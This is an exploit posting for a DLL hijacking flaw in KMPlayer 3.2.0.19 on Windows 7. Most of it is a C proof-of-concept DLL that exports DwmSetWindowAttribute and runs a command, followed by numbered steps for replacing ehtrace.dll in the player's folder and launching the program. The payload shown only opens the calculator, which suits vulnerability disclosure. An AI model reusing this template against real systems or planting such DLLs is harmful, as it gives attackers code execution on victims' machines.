KMPlayer version 3.2.0.19 suffers from a DLL hijacking vulnerability.
e710953170f62944c95092c7d7f49e5821951feac65493d0dc8d7059e53707a9
Exploit Title: KMPlayer 3.2.0.19 hijacking vulnerability (ehtrace.dll)
Author: nimaarek
Software Link: http://kmplayer.en.softonic.com
Version: 3.2.0.19
Tested on: Windows 7
.__ __
____ |__| _____ _____ _____ _______ ____ | | __
/ \| |/ \\__ \ \__ \\_ __ \_/ __ \| |/ /
| | \ | Y Y \/ __ \_/ __ \| | \/\ ___/| <
|___| /__|__|_| (____ (____ /__| \___ >__|_ \
\/ \/ \/ \/ \/ \/
/*
=============================================================
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
=============================================================
Instructions:
1. Compile dll
2. Replace ehtrace.dll in KMPlayer directory with your newly compiled dll
3. Launch KMPlayer
4. Bo0o0o0o0o0o0o0m !
Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+